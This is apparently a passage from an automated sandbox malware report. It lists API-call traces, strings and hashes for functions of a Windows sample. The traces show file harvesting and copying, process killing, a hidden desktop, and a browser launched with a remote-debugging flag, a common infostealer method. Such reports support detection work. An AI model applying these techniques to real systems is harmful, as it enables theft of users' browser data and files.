                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 14bf88c8dd114b68185fa37fe7e349d69a8f5b79ced0223a6352a71bc57471f2
                                • Instruction ID: cda2eddd751832372342bad52d316f30848c9a5e066f76a1f4e846f7a9d69218
                                • Opcode Fuzzy Hash: 14bf88c8dd114b68185fa37fe7e349d69a8f5b79ced0223a6352a71bc57471f2
                                • Instruction Fuzzy Hash: 4D127471A102069BCB25EF78E889AAE77F8AF44305F44696CFD86F7240DB34DC458B91
                                Function 00E5CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E5CBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5CC13
                                • lstrcat.KERNEL32(?,?), ref: 00E5CC5F
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5CC71
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5CC8B
                                • wsprintfA.USER32 ref: 00E5CCB0
                                • PathMatchSpecA.SHLWAPI(?,016C89E8), ref: 00E5CCE2
                                • CoInitialize.OLE32(00000000), ref: 00E5CCEE
                                  • Part of subcall function 00E5CAE0: CoCreateInstance.COMBASE(00E6B110,00000000,00000001,00E6B100,?), ref: 00E5CB06
                                  • Part of subcall function 00E5CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E5CB46
                                  • Part of subcall function 00E5CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00E5CBC9
                                • CoUninitialize.COMBASE ref: 00E5CD09
                                • lstrcat.KERNEL32(?,?), ref: 00E5CD2E
                                • lstrlen.KERNEL32(?), ref: 00E5CD3B
                                • StrCmpCA.SHLWAPI(?,00E6CFEC), ref: 00E5CD55
                                • wsprintfA.USER32 ref: 00E5CD7D
                                • wsprintfA.USER32 ref: 00E5CD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00E5CDB0
                                • wsprintfA.USER32 ref: 00E5CDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E5CDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00E5CE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00E5CE28
                                • CloseHandle.KERNEL32(00000000), ref: 00E5CE33
                                • CloseHandle.KERNEL32(00000000), ref: 00E5CE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E5CE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5CE94
                                • FindNextFileA.KERNEL32(?,?), ref: 00E5CF8D
                                • FindClose.KERNEL32(?), ref: 00E5CF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 1681974893add82a3d9701a0084bd6afae96db2de2a5dc22d521062ef81eddf7
                                • Instruction ID: 744aafb2262f0c6359a94ae1cf51f3fe86850a057e141435d890d24b0a52bb68
                                • Opcode Fuzzy Hash: 1681974893add82a3d9701a0084bd6afae96db2de2a5dc22d521062ef81eddf7
                                • Instruction Fuzzy Hash: 9BC18371A003089FCB24DF64DC59AEE77B9AF44305F109599FA49B7284EB35AE44CFA0
                                Function 00E51269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E51291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E512BF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E512CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E512E7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E512F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E5133A
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5135C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E51376
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E513AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E513D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E513E2
                                • lstrlen.KERNEL32(00E71794), ref: 00E513ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5140A
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E51416
                                • lstrlen.KERNEL32(?), ref: 00E51423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51443
                                • lstrcat.KERNEL32(00000000,?), ref: 00E51451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5147A
                                • StrCmpCA.SHLWAPI(?,016CD8F8), ref: 00E514A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E514E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51535
                                • StrCmpCA.SHLWAPI(?,016CDDB0), ref: 00E51552
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51593
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E515BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E515E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E51796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E517BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E517F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5181C
                                • FindClose.KERNEL32(00000000), ref: 00E5182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: b9d5d96e37eff3c82f250fab3dd74d53fbddbe83bd52b347446ae4a32ddb90bb
                                • Instruction ID: 947dea1c74cca47250455da6ec87e0d5368cfcb8bfc24de8cd935bb159ee239a
                                • Opcode Fuzzy Hash: b9d5d96e37eff3c82f250fab3dd74d53fbddbe83bd52b347446ae4a32ddb90bb
                                • Instruction Fuzzy Hash: 27C16231A102069BCB21EF78E889BAE77F8AF44319F44656CFD45B7241DB34DD498BA0
                                Function 00E49770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00E49790
                                • lstrcat.KERNEL32(?,?), ref: 00E497A0
                                • lstrcat.KERNEL32(?,?), ref: 00E497B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00E497C3
                                • memset.MSVCRT ref: 00E497D7
                                  • Part of subcall function 00E63E70: lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E63EA5
                                  • Part of subcall function 00E63E70: lstrcpy.KERNEL32(00000000,016CE788), ref: 00E63ECF
                                  • Part of subcall function 00E63E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00E4134E,?,0000001A), ref: 00E63ED9
                                • wsprintfA.USER32 ref: 00E49806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00E49827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00E49844
                                  • Part of subcall function 00E646A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E646B9
                                  • Part of subcall function 00E646A0: Process32First.KERNEL32(00000000,00000128), ref: 00E646C9
                                  • Part of subcall function 00E646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E646DB
                                  • Part of subcall function 00E646A0: StrCmpCA.SHLWAPI(?,?), ref: 00E646ED
                                  • Part of subcall function 00E646A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E64702
                                  • Part of subcall function 00E646A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E64711
                                  • Part of subcall function 00E646A0: CloseHandle.KERNEL32(00000000), ref: 00E64718
                                  • Part of subcall function 00E646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00E64726
                                  • Part of subcall function 00E646A0: CloseHandle.KERNEL32(00000000), ref: 00E64731
                                • lstrcat.KERNEL32(00000000,?), ref: 00E49878
                                • lstrcat.KERNEL32(00000000,?), ref: 00E49889
                                • lstrcat.KERNEL32(00000000,00E74B60), ref: 00E4989B
                                • memset.MSVCRT ref: 00E498AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E498D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E49903
                                • StrStrA.SHLWAPI(00000000,016CEC78), ref: 00E49919
                                • lstrcpyn.KERNEL32(010793D0,00000000,00000000), ref: 00E49938
                                • lstrlen.KERNEL32(?), ref: 00E4994B
                                • wsprintfA.USER32 ref: 00E4995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00E49971
                                • Sleep.KERNEL32(00001388), ref: 00E499E7
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E492E1
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E492FA
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E49399
                                  • Part of subcall function 00E492B0: strlen.MSVCRT ref: 00E493E6
                                  • Part of subcall function 00E64740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00E64759
                                  • Part of subcall function 00E64740: Process32First.KERNEL32(00000000,00000128), ref: 00E64769
                                  • Part of subcall function 00E64740: Process32Next.KERNEL32(00000000,00000128), ref: 00E6477B
                                  • Part of subcall function 00E64740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E6479C
                                  • Part of subcall function 00E64740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00E647AB
                                  • Part of subcall function 00E64740: CloseHandle.KERNEL32(00000000), ref: 00E647B2
                                  • Part of subcall function 00E64740: Process32Next.KERNEL32(00000000,00000128), ref: 00E647C0
                                  • Part of subcall function 00E64740: CloseHandle.KERNEL32(00000000), ref: 00E647CB
                                • CloseDesktop.USER32(?), ref: 00E49A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: bc4c74f83aba2f32f8a8dbd20067cb4e6ff30eebe0ad2f96826deb2b0e935c6a
                                • Instruction ID: f377e2c18bdfff94e6fa60f3d6d0f64f7ed0098c6bdf9f57b2e759a41ee178b5
                                • Opcode Fuzzy Hash: bc4c74f83aba2f32f8a8dbd20067cb4e6ff30eebe0ad2f96826deb2b0e935c6a
                                • Instruction Fuzzy Hash: 00918471A50208AFDB20DF74DC49FDE77B8AF48704F508099FA49B7281DB75AA448BA0
                                Function 00E5E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E5E22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5E243
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5E263
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5E27D
                                • wsprintfA.USER32 ref: 00E5E2A2
                                • StrCmpCA.SHLWAPI(?,00E6CFEC), ref: 00E5E2B4
                                • wsprintfA.USER32 ref: 00E5E2D1
                                  • Part of subcall function 00E5EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E5EE12
                                • wsprintfA.USER32 ref: 00E5E2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 00E5E304
                                • lstrcat.KERNEL32(?,016CF2B8), ref: 00E5E335
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5E347
                                • lstrcat.KERNEL32(?,?), ref: 00E5E358
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5E36A
                                • lstrcat.KERNEL32(?,?), ref: 00E5E37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E5E394
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E422
                                • DeleteFileA.KERNEL32(?), ref: 00E5E45C
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5E49B
                                • FindClose.KERNEL32(00000000), ref: 00E5E4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 688ad3edef8fa1164a34f576f9de19acf9feaaca65585b08e0c814ed43ee0cc8
                                • Instruction ID: 681f89350d0ab1c83cb268320b53049ac9fbc1014a68aac1689874d67478ae3b
                                • Opcode Fuzzy Hash: 688ad3edef8fa1164a34f576f9de19acf9feaaca65585b08e0c814ed43ee0cc8
                                • Instruction Fuzzy Hash: 3C819671D102189BCB24EF74DC49AEE77B9BF44304F009999B959B3245DB35AB48CFA0
                                Function 00E416B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E416E2
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4176C
                                • lstrcat.KERNEL32(00000000), ref: 00E41776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E418F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E418FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: f9d958ec440645ea5bca129e7f4d9f86c616aa7181d0da3675040e2c5d8efa98
                                • Instruction ID: 86cad7420c73278768b6185092c8b7a3867105c54f924cd8351dc8432fd949a3
                                • Opcode Fuzzy Hash: f9d958ec440645ea5bca129e7f4d9f86c616aa7181d0da3675040e2c5d8efa98
                                • Instruction Fuzzy Hash: 948190309102099FCF21EF68F889AAE7BF4AF44318F446169FA45B7245DB34ED41CBA1
                                Function 00E5DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E5DD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E5DD4C
                                • wsprintfA.USER32 ref: 00E5DD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5DD79
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5DD9C
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5DDB6
                                • wsprintfA.USER32 ref: 00E5DDD4
                                • DeleteFileA.KERNEL32(?), ref: 00E5DE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E5DDED
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                  • Part of subcall function 00E41530: lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                  • Part of subcall function 00E5D980: memset.MSVCRT ref: 00E5D9A1
                                  • Part of subcall function 00E5D980: memset.MSVCRT ref: 00E5D9B3
                                  • Part of subcall function 00E5D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E5D9DB
                                  • Part of subcall function 00E5D980: lstrcpy.KERNEL32(00000000,?), ref: 00E5DA0E
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,00000000), ref: 00E5DA1C
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,016CEC60), ref: 00E5DA36
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,?), ref: 00E5DA4A
                                  • Part of subcall function 00E5D980: lstrcat.KERNEL32(?,016CD838), ref: 00E5DA5E
                                  • Part of subcall function 00E5D980: lstrcpy.KERNEL32(00000000,?), ref: 00E5DA8E
                                  • Part of subcall function 00E5D980: GetFileAttributesA.KERNEL32(00000000), ref: 00E5DA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5DE2E
                                • FindClose.KERNEL32(00000000), ref: 00E5DE3D
                                • lstrcat.KERNEL32(?,016CF2B8), ref: 00E5DE66
                                • lstrcat.KERNEL32(?,016CDE10), ref: 00E5DE7A
                                • lstrlen.KERNEL32(?), ref: 00E5DE84
                                • lstrlen.KERNEL32(?), ref: 00E5DE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5DED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
